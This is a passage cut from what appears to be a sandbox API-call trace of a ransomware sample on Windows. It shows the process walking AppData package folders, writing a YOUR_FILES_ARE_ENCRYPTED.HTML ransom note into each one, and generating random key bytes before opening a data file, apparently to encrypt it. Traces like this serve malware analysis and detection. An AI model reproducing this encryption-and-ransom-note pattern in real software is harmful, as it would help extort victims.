lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0114.756] CloseHandle (hObject=0x324) returned 1 [0114.757] GetProcessHeap () returned 0x600000 [0114.757] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.757] GetProcessHeap () returned 0x600000 [0114.757] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0114.757] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6117c64c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6117c64c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6117c64c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0114.757] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.757] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AppData") returned 96 [0114.757] GetProcessHeap () returned 0x600000 [0114.758] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0114.759] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AppData" [0114.759] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AppData\\*" [0114.759] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6117c64c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6117c64c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6117c64c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f189a, dwReserved1=0x6f17e8, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0114.760] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6117c64c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6117c64c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6117c64c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f189a, dwReserved1=0x6f17e8, cFileName="..", cAlternateFileName="")) returned 1 [0114.760] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6117c64c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6117c64c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6117c64c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f189a, dwReserved1=0x6f17e8, cFileName="..", cAlternateFileName="")) returned 0 [0114.760] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0114.760] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0114.760] GetProcessHeap () returned 0x600000 [0114.760] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.761] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.accountscontrol_cw5n1h2txyewy\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0114.761] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0114.762] CloseHandle (hObject=0x324) returned 1 [0114.762] GetProcessHeap () returned 0x600000 [0114.762] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.762] GetProcessHeap () returned 0x600000 [0114.762] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0114.763] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6117c64c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6117c64c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6117c64c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0114.763] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.763] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\LocalCache") returned 99 [0114.763] GetProcessHeap () returned 0x600000 [0114.763] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0114.764] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\LocalCache" [0114.764] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\LocalCache\\*" [0114.764] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6117c64c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6117c64c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6117c64c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f189a, dwReserved1=0x6f17e8, cFileName=".", cAlternateFileName="")) returned 0x626778 [0114.764] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6117c64c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6117c64c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6117c64c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f189a, dwReserved1=0x6f17e8, cFileName="..", cAlternateFileName="")) returned 1 [0114.764] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6117c64c, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6117c64c, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6117c64c, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f189a, dwReserved1=0x6f17e8, cFileName="..", cAlternateFileName="")) returned 0 [0114.765] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0114.765] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 129 [0114.765] GetProcessHeap () returned 0x600000 [0114.765] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.765] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.accountscontrol_cw5n1h2txyewy\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0114.766] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0114.767] CloseHandle (hObject=0x324) returned 1 [0114.767] GetProcessHeap () returned 0x600000 [0114.767] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.767] GetProcessHeap () returned 0x600000 [0114.767] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0114.767] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61156378, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x61156378, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x61156378, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0114.767] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.768] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\LocalState") returned 99 [0114.768] GetProcessHeap () returned 0x600000 [0114.768] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0114.768] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\LocalState" [0114.768] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\LocalState\\*" [0114.768] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61156378, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x61156378, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x61156378, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f189a, dwReserved1=0x6f17e8, cFileName=".", cAlternateFileName="")) returned 0x626838 [0114.769] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61156378, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x61156378, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x61156378, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f189a, dwReserved1=0x6f17e8, cFileName="..", cAlternateFileName="")) returned 1 [0114.769] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61156378, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x61156378, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x61156378, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f189a, dwReserved1=0x6f17e8, cFileName="..", cAlternateFileName="")) returned 0 [0114.769] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0114.769] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 129 [0114.769] GetProcessHeap () returned 0x600000 [0114.769] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0114.769] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.accountscontrol_cw5n1h2txyewy\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0114.770] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0114.771] CloseHandle (hObject=0x324) returned 1 [0114.771] GetProcessHeap () returned 0x600000 [0114.771] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0114.771] GetProcessHeap () returned 0x600000 [0114.771] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0114.772] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x612ad819, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x612ad819, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x612ad819, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Microsoft.AccountsControl_10.0.10586.0_neutral__cw5n1h2txyewy", cAlternateFileName="MICROS~1.0_N")) returned 1 [0114.772] StrStrIW (lpFirst="Microsoft.AccountsControl_10.0.10586.0_neutral__cw5n1h2txyewy", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.772] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Microsoft.AccountsControl_10.0.10586.0_neutral__cw5n1h2txyewy") returned 150 [0114.772] GetProcessHeap () returned 0x600000 [0114.772] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0114.773] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Microsoft.AccountsControl_10.0.10586.0_neutral__cw5n1h2txyewy" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Microsoft.AccountsControl_10.0.10586.0_neutral__cw5n1h2txyewy") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Microsoft.AccountsControl_10.0.10586.0_neutral__cw5n1h2txyewy" [0114.773] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Microsoft.AccountsControl_10.0.10586.0_neutral__cw5n1h2txyewy", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Microsoft.AccountsControl_10.0.10586.0_neutral__cw5n1h2txyewy\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Microsoft.AccountsControl_10.0.10586.0_neutral__cw5n1h2txyewy\\*" [0114.773] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Microsoft.AccountsControl_10.0.10586.0_neutral__cw5n1h2txyewy\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x612ad819, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x612ad819, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x612ad819, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f189a, dwReserved1=0x6f17e8, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0114.774] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x612ad819, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x612ad819, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x612ad819, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f189a, dwReserved1=0x6f17e8, cFileName="..", cAlternateFileName="")) returned 1 [0114.774] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x612ad819, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x612ad819, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x612ad819, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f189a, dwReserved1=0x6f17e8, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 1 [0114.774] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.774] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Microsoft.AccountsControl_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore") returned 166 [0114.775] GetProcessHeap () returned 0x600000 [0114.775] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0114.776] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Microsoft.AccountsControl_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Microsoft.AccountsControl_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Microsoft.AccountsControl_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore" [0114.776] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Microsoft.AccountsControl_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Microsoft.AccountsControl_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Microsoft.AccountsControl_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\*" [0114.776] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Microsoft.AccountsControl_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x612ad819, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x612ad819, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x612ad819, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318de30, dwReserved1=0x6f17f0, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0114.777] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x612ad819, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x612ad819, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x612ad819, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318de30, dwReserved1=0x6f17f0, cFileName="..", cAlternateFileName="")) returned 1 [0114.777] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x612ad819, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6131ff94, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6131ff94, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x318de30, dwReserved1=0x6f17f0, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0114.777] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0114.777] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Microsoft.AccountsControl_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat") returned 186 [0114.777] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0114.777] lstrlenW (lpString=".dat") returned 4 [0114.777] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0114.777] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0114.777] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.AccountsControl_cw5n1h2txyewy\\Microsoft.AccountsControl_10.0.10586.0_neutral__cw5n1h2txyewy\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.accountscontrol_cw5n1h2txyewy\\microsoft.accountscontrol_10.0.10586.0_neutral__cw5n1h2txyewy\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x214 [0114.780] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=65536) returned 1 [0114.780] GetProcessHeap () returned 0x600000 [0114.780] RtlAllocateHeap 